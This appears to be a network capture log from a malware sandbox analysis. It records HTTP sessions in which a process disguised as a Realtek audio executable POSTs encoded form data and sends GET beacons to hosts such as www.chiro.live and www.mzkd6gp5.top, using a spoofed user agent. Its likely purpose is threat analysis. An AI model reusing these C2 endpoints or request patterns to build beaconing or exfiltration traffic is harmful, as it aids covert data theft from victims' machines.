Jan 9, 2025 08:30:25.103106976 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:30:25 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 06 db 31 6e 20 9d 84 fa b3 8e 9d 38 4e 00 5f 32 42 52 2c 11 21 51 10 60 a7 d3 ff 5e 6c 3a 31 1d f7 50 1d 90 76 d9 7d bb ef ad 64 7d f8 b6 70 56 fe dd 40 21 32 62 57 67 d6 7e 53 18 e0 1b 5b c5 5c bd 3a 53 ca 65 11 0c 50 75 3c 98 11 96 40 81 04 24 29 96 b6 fa b8 1a 36 cc 3f 91 c7 df 44 ca b8 81 7f 64 34 b7 d5 6d 23 03 0d 28 a2 18 48 1a 30 ac 2a 50 70 89 79 99 3b 19 d8 18 6d f0 49 36 07 11 b6 d5 9c e2 22 16 89 ac 25 14 14 49 62 23 9c 53 88 1b 07 e3 b3 42 39 95 14 b0 46 0a 01 c3 b6 de 6c d5 e1 24 95 0c 5f 59 5a b5 1f e8 1c 9a e4 22 85 09 8d e5 91 d6 bf 7b 4f f0 4b 82 53 52 6b a1 75 99 25 cc de f3 fb a2 69 45 51 f4 5a 4d 48 68 22 9a 8c e6 58 53 15 ed 08 69 69 a7 65 ac 83 7a 75 79 4e 4b 74 ff af 84 a5 1d 07 63 05 02 ed 14 c1 99 00 c8 56 91 78 ae 8e 1f 3f d5 c5 a8 28 2b 72 17 97 ea 4a bc 95 5a 08 72 50 79 6b 71 7b 25 5e 32 0e 25 15 5c a9 41 29 3f df f5 db 87 ec 57 41 39 12 45 53 8a b8 c9 04 2c e7 2b 78 93 94 84 14 [TRUNCATED] Data Ascii: 266SMs0WPv61n 8N_2BR,!Q`^l:1Pv}d}pV@!2bWg~S[\:SePu<@$)6?Dd4m#(H0Ppy;mI6"%Ib#SB9Fl$_YZ"{OKSRku%iEQZMHh"XSiiezuyNKtcVx?(+rJZrPykq{%^2%\A)?WA9ES,+x[Qm<LOQdE3nfkB<dx7aJ^7p78hM{TXP3GmEsi>1sY<;Mk/`%p\|wNwnMX{80:9=:l"63pC'k1G6!_?uPnVpQv#!BU9^5_oJ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49716	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:27.634288073 CET	2578	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 [TRUNCATED] Data Ascii: cOnShP=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/Nxv [TRUNCATED]
Jan 9, 2025 08:30:27.634341002 CET	3867	OUT	Data Raw: 4f 5a 43 76 66 67 43 74 73 70 4a 53 45 49 70 52 70 72 2f 48 69 52 6b 78 6d 79 35 75 6a 46 79 53 6a 2f 5a 4b 52 56 74 56 6d 2f 63 75 63 37 48 54 61 31 36 4c 47 66 72 37 31 76 75 4f 4e 53 74 61 53 37 4f 6a 63 38 34 51 4b 59 46 4e 67 61 55 76 33 62 Data Ascii: OZCvfgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP
Jan 9, 2025 08:30:27.634361982 CET	1517	OUT	Data Raw: 76 6b 48 35 45 53 4d 6f 62 4a 76 51 4a 54 5a 61 34 33 6b 34 2b 45 6e 4e 67 2b 35 77 55 43 66 53 46 74 35 51 4b 4a 49 51 5a 2f 4e 69 62 46 57 57 6f 51 7a 54 65 7a 4e 53 6b 48 62 56 48 53 66 76 78 37 37 6a 75 6d 37 69 53 50 33 46 53 48 72 59 33 78 Data Ascii: vkH5ESMobJvQJTZa43k4+EnNg+5wUCfSFt5QKJIQZ/NibFWWoQzTezNSkHbVHSfvx77jum7iSP3FSHrY3x1dye2vFj4TkwklhEKs7k6Mqfm5AqaNs8o1vJNwZdVXrW7ukgSVTSqIWKO8Cut2Uc3mjTk1tJyFSUbQT0Jl9qQsViY/zaDBRtYe1ASq7jj0grcdzulqX95UN4sk/Qw4/dHW8InFcDbDg+Vs74pEAXXRhpO3LPDyt9C
Jan 9, 2025 08:30:27.780854940 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:30:27 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 cb 4e 6c 37 90 4e 42 e3 af 12 3b 71 9c 60 fb 92 11 92 62 89 08 89 82 00 3b 9d fe f7 82 e9 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 fd e1 db cc 5d ac ee 6e 14 22 23 76 79 62 57 9b c2 00 df 38 2a e6 ea e5 89 52 2e 9b 60 80 ea e3 de 8c b0 04 0a 24 20 49 b1 74 d4 c7 c5 a0 d5 fb 13 79 f8 4d a4 8c 5b f8 47 46 73 47 dd b6 32 d0 82 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 e3 1b 07 a3 0d 3e ca e6 20 c2 8e 9a 53 5c c4 22 91 8d 84 82 22 49 1c 84 73 0a 71 6b 6f 7c 56 28 a7 92 02 d6 4a 21 60 d8 31 35 a3 09 27 a9 64 f8 d2 d6 eb 7d 4f 67 df 24 17 29 4c 68 2c 0f b4 fe dd 7b 82 5f 12 9c 92 46 0b c6 45 96 30 a7 e2 f7 45 d7 8b a2 e8 1a 1a 24 34 11 1a a3 39 d6 55 45 3f 40 da fa 71 19 7b af 5e 53 9e e3 12 67 ff 57 c2 d6 0f 83 b1 03 81 76 8a e0 4c 00 e4 a8 48 3c d7 c7 8f 9f 9a 62 d4 94 15 b9 8b 4b 75 25 de 4a 3d 04 39 a8 bd 8d b8 4a 89 97 8c 43 49 05 57 1a 50 ca cf 77 fd aa 90 6a 15 94 23 51 68 52 c4 1a 13 b0 9c af e0 1a 29 09 29 8e [TRUNCATED] Data Ascii: 266SMs0WPvNl7NB;q`b;tCu@e]n"#vybW8*R.`$ ItyM[GFsG2"> S\""Isqko\|V(J!`15'd}Og$)Lh,{_FE0E$49UE?@q{^SgWvLH<bKu%J=9JCIWPwj#QhR))$ju;i,1Y]0nB<d:x71aJgzV^-^^rn\|>v{FOz9aV@y1Q,'mc=#2{84\/q(6c>gxt\u)ACEZ^<Nf:ko7dr#Y$k1G6_?qPnWQzIB0d%N&}sI_k:-[o^u[nJs}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49717	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:30.303564072 CET	538	OUT	GET /jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:30:30.448632002 CET	1289	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:30:30 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 41 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED] Data Ascii: 4A5<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736407830.0024947034&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJjT25TaFA9bmJFYjZCYXBqckNZZDN2cElVNjVkUlRhb1BLMmM0ODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tSYjlSSHRpdjg3U1p3eE15SWs9Jk52QT1xVXdQUVBUUW1Ud3lpelRVIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9u [TRUNCATED]
Jan 9, 2025 08:30:30.448642969 CET	68	IN	Data Raw: 6a 63 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: jcifQ=="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49718	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:35.930080891 CET	799	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d Data Ascii: cOnShP=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
Jan 9, 2025 08:30:36.487658024 CET	816	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=otQSZtFU0TCQK710aJH0X01cb7MPO4YA0Hoi1m%2B8gbbl3PyOVDiXE4ljQWMBwl8%2FuePKtJdoEZcD4tJhvUfvOSpbGrJaPSnqdmVDsFDI6JVP4AtL1UaT1NSszxbiUniYODP%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2b90ef8336378-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118610&min_rtt=118610&rtt_var=59305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Jan 9, 2025 08:30:36.487751961 CET	105	IN	Data Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:30:36.487761974 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49719	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:38.573808908 CET	819	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d Data Ascii: cOnShP=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
Jan 9, 2025 08:30:39.114554882 CET	913	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qmn3JDXp8CWZCSsqPB3pH%2FMEoRG1t8u1ZGJAsKZjQjBraQzhb8bvXAN22jN%2FArTpMzaYkcxzzcBN2UVrUl1hGhXX%2B57UDhag8m12rXX6LPvKVHtg41Bea%2Bi7lc9M4nsTFQvK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2b91f79591b67-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119206&min_rtt=119206&rtt_var=59603&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:30:39.114563942 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49720	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:41.217196941 CET	2578	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 [TRUNCATED] Data Ascii: cOnShP=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpy [TRUNCATED]
Jan 9, 2025 08:30:41.217281103 CET	5390	OUT	Data Raw: 56 71 77 32 32 73 4d 66 6c 4d 35 39 79 41 39 4f 4b 2f 53 52 46 61 37 42 37 57 52 2f 33 30 57 7a 58 67 63 69 6d 76 44 7a 49 71 65 70 35 2f 67 59 68 2b 53 61 2f 61 55 4f 35 70 6c 38 67 68 47 57 51 6b 47 45 4e 4f 63 36 5a 2f 59 33 6b 7a 77 6e 7a 75 Data Ascii: Vqw22sMflM59yA9OK/SRFa7B7WR/30WzXgcimvDzIqep5/gYh+Sa/aUO5pl8ghGWQkGENOc6Z/Y3kzwnzuLP+BQevab1BQL6Wvmcl47ytt7GKrJeTNJpJzYE6UETuJOWsFdwWbFl3nID9aMo0CBS0TKTeDK4KwxIl4j0+KvD0lxrwdVSjpt7Fuu04aOsplYuI5zvlmKj3Ll3NbqhPuNcVEmG8+SdWjMsSaJemQp3ISj3enZcxmO
Jan 9, 2025 08:30:41.758476019 CET	914	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Um%2BrAlG4hRyOm9rjqy6%2Fr7f79PY8UyruFKVS4Dcf8VRxaNA9jMXuOJPZLTET2Z9teMZkAaNR%2FJ8qmRsqnVl1BA6AGXZFUm1MOmaKUerI4aAROMutxoIybmY5W0UmIwmB%2BG3S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2b9300ff961b2-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: 